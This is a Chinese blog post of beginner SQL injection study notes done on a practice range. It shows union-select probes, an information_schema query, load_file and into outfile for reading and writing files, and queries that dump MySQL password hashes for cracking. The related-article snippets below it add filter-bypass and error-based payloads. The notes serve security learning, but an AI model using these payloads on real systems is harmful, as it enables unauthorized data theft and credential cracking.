学习记录-SQL注入-1

最新推荐文章于 2024-05-17 08:39:11 发布
最新推荐文章于 2024-05-17 08:39:11 发布
阅读量81 收藏
点赞数
文章标签: 学习 sql 数据库 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41567985/article/details/132368769
版权
文章讨论了URL测试中的SQL注入检测方法,涉及MySQL5.5和5.6/5.7版本的安全差异,以及如何利用secure_file_priv和load_file/inoutfile函数进行文件操作。重点提到了在拥有DBA权限时,通过读取Hash来解密敏感信息的过程。
摘要由CSDN通过智能技术生成

url测试回显

url:http://xxxxxxxx/? id=-1 union select 1,2,3,4

有时候数字是1,2,3 也有时候是1,2,3,4等等...不是很确定

 对应的数字位如果回显,则那个位置存在构筑语句


#2 和 3位置回显
#​http://xxxxxxxx/? id=-1 union select 1,2,3
select 1,sql语句,3 sql语句

我的例子:

使用靶场:

测试sql语句:

               union select group_concat(schema_name) from information_schema.schemata

返回结果:

 查证:

        

 

函数使用

前提

 在 MySQL 5.5 之前 secure_file_priv 默认是这个情况下可以向任意绝对路径写文件

 在 MySQL 5.5之后 secure_file_priv 默认是 NULL,这个情况下不可以写文件

 函数:load_file、into outfile

#读取路径文件
select load_file('文件路径');

#像指定路径创建文件并写入数据
select '写入的文本' into outfile '路径/文件';

常见的敏感信息路径 windows和linux

--这里使用了博主weixin_30292843的文章

Hash 获取与解密

假设存在 SQL 注入 DBA 权限,如果目标 3306 端口也是可以访问通的话,可以尝试读取 MySQL 的 Hash 来解密:

# MySQL <= 5.6 版本
mysql> select host, user, password from mysql.user;
+-----------+------+-------------------------------------------+
| host      | user | password                                  |
+-----------+------+-------------------------------------------+
| localhost | root | *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B |
| 127.0.0.1 | root | *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B |
| ::1       | root | *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B |
| %         | root | *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B |
+-----------+------+-------------------------------------------+

# MySQL >= 5.7 版本
mysql > select host,user,authentication_string from mysql.user;
+-----------+---------------+-------------------------------------------+
| host      | user          | authentication_string                     |
+-----------+---------------+-------------------------------------------+
| localhost | root          | *8232A1298A49F710DBEE0B330C42EEC825D4190A |
| localhost | mysql.session | *THISISNOTAVALIDPASSWORDTHATCANBEUSEDHERE |
| localhost | mysql.sys     | *THISISNOTAVALIDPASSWORDTHATCANBEUSEDHERE |
+--

         ---->我的机器:

                

        去cmd5解密后:Cmd5 - MD5 Online ,MD5 Decryption, MD5 Hash Decoder

                

 

 

TYR2
关注
【漏洞复现】挂号系统-SQL注入-login
知黑而守白
07-05 110
挂号系统是医疗服务中不可或缺的一部分,旨在提高就医效率和优化资源配置。该系统通过线上或线下方式,如互联网、自助挂号机、电话等,为患者提供便捷的挂号服务。患者或家属可以随时随地预约挂号,节省了大量时间和精力。同时,挂号系统还提供了医生的排班信息、号源情况等,使患者能够更清楚地了解医疗资源情况。此外,挂号系统还采用了多种技术手段,如指纹识别、生物特征匹配等,以抑制非法倒号行为,保护患者的合法权益。总之,挂号系统是医疗服务信息化、智能化的重要体现,为患者提供了更加便捷、高效的医疗服务。
二、CTF-Web-SQL注入记录CTF学习
qq_27920699的博客
12-16 475
个人CTF学习之路
sql注入--1初识sql注入
技术骨干小李的博客
07-13 633
sql注入的迅速了解
SQL注入-1
ahu0076的博客
04-18 119
select * from table_name where id=1 select version() 显示数据库的版本信息 select * from table_name where id=1 order by 1; 猜表的列数 order by 后面从1开始依次猜解 union前后语句的列数必须相同 select * from table_name where id ...
SQL注入详解-1
weixin_33859844的博客
11-09 99
&lt; DOCTYPE html PUBLIC -WCDTD XHTML StrictEN httpwwwworgTRxhtmlDTDxhtml-strictdtd&gt; 随着B/S 模式应用开发的发展,使用这种模式编写应用程序的程序员也越来越多。但是由于这个行业的入门门槛不高,程序员的水平及经验也参差不齐,相当大一部分程序员在编写代码的时候,没有对用户输入数据的合法性...
[CTF]简单的sql注入之1
胖胖的ALEX
06-26 1164
类型:web 网址:http://www.shiyanbar.com/ctf/1875 攻击:sql注入 一句话总结: id有回显的sql注入(手工) Writeup: Union、select等被过滤,使用union%0a、select%0a代替 或者%0a用/**/替代也可以。 爆数据库名称: 1'/**/union/**/select/**/schema_name/**/from/**/in...
学习笔记-SQL注入-1
weixin_52501704的博客
09-15 294
关于学习笔记-SQL注入-1
concat mysql sql注入_Web安全测试学习笔记-SQL注入-利用concat和updatexml函数
weixin_42097668的博客
12-29 413
mysql数据库中有两个函数:concat和updatexml,在sql注入时经常组合使用,本文通过学习concat和updatexml函数的使用方法,结合实例来理解这种sql注入方式的原理。concat函数是mysql的字符串连接函数,定义如下: 先来验证下concat函数的功能:select concat('m','y','s','q','l')验证结果:如定义所示,concat将字符串连接起...
sqli-sql注入著名靶场
03-28
在本文中,我们将深入探讨SQL注入攻击、如何防范以及“sqli-sql注入著名靶场”这个资源在学习和提升安全防护能力方面的作用。 首先,SQL注入攻击的原理是利用不安全的SQL查询语句,通过输入恶意数据来控制数据库...
第16天:WEB漏洞-SQL注入之查询方式及报错盲注1
08-03
SQL注入】是一种常见的网络安全漏洞,发生在Web应用程序中,攻击者通过输入恶意的SQL语句来控制或篡改数据库。本话题主要关注的是在没有直接回显的情况下如何进行SQL注入,特别是通过查询方式和报错盲注技术。 **...
sql注入
kimojinmmp的博客
04-03 1949
1.注入攻击原理是什么?如何找注入点?如何判断注入点? 原理:通过构建特殊输入作为参数传入web应用程序,通过执行注入的sql 语句来达到获取sql权限的目的。 注入点:一切与数据库产生交互的操作都可能是注入点。 判断注入点: 1.搜索框或URL尾端加’如果报错则可能存在sql注入漏洞 2.数字型判断是否有注入 and 1=1//返回正确页面 and 1=2//返回错误页面 3.字符型判断是否有注入 and ‘1’='1//返回正确页面 and '1='2//返回错误页面 2.注入分为几类及提交方式是什么
Sql注入-1:sql注入基本原理
jiege1998的博客
09-04 2322
目录 前言 一、SQL注入介绍 二、学习环境介绍 三、SQL注入原理 总结 前言 在网络安全领域中,sql注入是一个无法被忽视的关键点,曾经多少的网站都因此被攻破,直到现在很多网站依旧存在很多sql注入的漏洞和风险点。Sql注入的原理简单,但变化和危害特别严重,属于“上有政策,下有对策”的风险点,也是从事渗透攻防必不可少的一个知识点。本人因近期学习渗透测试相关内容,特此记录学习过程中的笔记,若你也是刚入门渗透安全,或许会有帮助,也希望可以一起交流。 一、SQL注入介绍 ...
i春秋之SQL注入-1
金 帛的博客
04-04 740
i春秋WP
sql注入
m0_66618018的博客
10-25 686
SQL手工注入
【BUCTF】[第一章 web入门]SQL注入-1——手工注入全解析
自知.的博客
03-11 496
BUCTF[第一章 web入门]SQL注入-1之手工注入全解析,1. 根据注入位置数据类型将sql注入分类 2. 利用order判断字段数 order by x(数字) 正常与错误的正常值 正确网页正常显示,错误网页报错 ?id=1' order by 3 3. 利用 union select 联合查询 将id值设置成不成立,即可探测到可利用的字段数 ?id=-1 union select 1,2,3 4. 利用函数database(),user(),version()可以得到所探测数据库数据库名、用户名
SQL注入介绍_sql注入id=-1含义(1)
最新发布
2401_84281720的博客
05-17 1380
id=-1’ union select 1,要查询的字段名1,要查询的字段名2 from 要查询的表 //查询一年字段中的内容?id=-1’ union select 1,unhex(hex(username)),unhex(hex(password)),4 from admin //若内容无法显示,则unhex编码。
浅谈SQL注入中的-1‘ union select 1,2,3#
dzqxwzoe的博客
03-12 1766
经过本文的阅读,相信小白已经可以理解SQL注入语句中的这条语句了吧?将上面所有的内容概括为一句话就是大家常说的:判断回显位。当然,这条语句并不是固定的,要根据目标数据库返回的报错信息等各种情况来构造针对目标数据库SQL注入语句。
SQL注入介绍
流浪法师的博客
12-18 899
本篇文章介绍了sql注入的常见注入类型及方法!
SQL注入学习之路:sqli-labs靶场实战解析
"sqli-labs靶场练习笔记涵盖了从2关到24关的SQL注入学习内容,适合初学者参考,涉及单引号、双引号注入,布尔盲注,数据库名、表名、列名的探测,以及利用注入进行文件写入和信息获取等技能。" 在SQL注入学习过程...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值